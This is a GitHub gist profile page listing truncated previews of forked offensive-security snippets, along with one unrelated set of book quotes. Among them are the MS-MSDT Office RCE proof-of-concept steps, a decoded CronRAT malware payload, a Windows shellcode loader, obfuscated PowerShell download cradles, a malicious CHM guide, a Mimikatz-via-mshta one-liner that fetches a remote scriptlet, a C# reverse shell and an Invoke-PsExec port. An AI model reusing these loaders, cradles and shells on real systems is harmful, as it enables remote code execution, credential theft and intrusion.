Skip to content

Instantly share code, notes, and snippets.

View thebigplate's full-sized avatar
🏠
Working from home

thebigplate

🏠
Working from home
4 followers · 6 following
View GitHub Profile
@thebigplate
thebigplate / ms-msdt.MD
Created May 31, 2022 20:04 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@thebigplate
thebigplate / _cronrat.sh
Created November 29, 2021 00:28 — forked from gwillem/_cronrat.sh
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
@thebigplate
thebigplate / shellcodeLoader.c
Created January 26, 2021 23:27 — forked from mgeeky/shellcodeLoader.c
Simplest windows shellcode loader there can be, purely in C
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: ./shellcodeLoader <shellcode64>\n");
return 1;
}
@thebigplate
thebigplate / Download-Cradles-Oneliners.md
Created January 26, 2021 23:27 — forked from mgeeky/Download-Cradles-Oneliners.md
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@thebigplate
thebigplate / Get-AntiVirusProduct.ps1
Created January 26, 2021 23:26 — forked from mgeeky/Get-AntiVirusProduct.ps1
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
function Get-AntiVirusProduct {
[CmdletBinding()]
param (
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[Alias('name')]
$computername=$env:computername
)
@thebigplate
thebigplate / Malicious-CHM-Guide.md
Created January 26, 2021 23:13 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@thebigplate
thebigplate / mimikatz.sct
Created August 7, 2020 00:29 — forked from chrismaddalena/mimikatz.sct
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@thebigplate
thebigplate / Simple_Rev_Shell.cs
Created July 20, 2020 04:32
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@thebigplate
thebigplate / it-doesn't-have-to-be-crazy-at-work.md
Created April 7, 2019 16:00
Some of my favorite quotes from "It Doesn't Have To Be Crazy At Work" by Jason Fried and David Heinemeier Hansson

Any mistakes are my own. Basecamp is a modern software company that (by many estimates) generates millions of dollars in profit each month.

Promise not to promise

Since the beginning of Basecamp, we've been loath to make promises about future product improvements. We've always wanted customers to judge the product they could buy and use today, not some imaginary version that might exist in the future.

The wrong time for real-time

Chat puts conversations on conveyor belts that are perpetually moving away from you. If you're not at your station when the conversation rolls by, you'll never get a chance to put in your two cents. This means if you want to have your say, you need to be paying attention all day (and often to multiple rooms/channels). ... Chat is great for hashing stuff our quickly when speed truly is important. ... It's also great for watercooler-like banter ... building a camaraderie among people during gaps in the workday.

@thebigplate
thebigplate / Invoke-Psexec.ps1
Created October 17, 2018 02:56 — forked from HarmJ0y/Invoke-Psexec.ps1
Invoke-Psexec
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the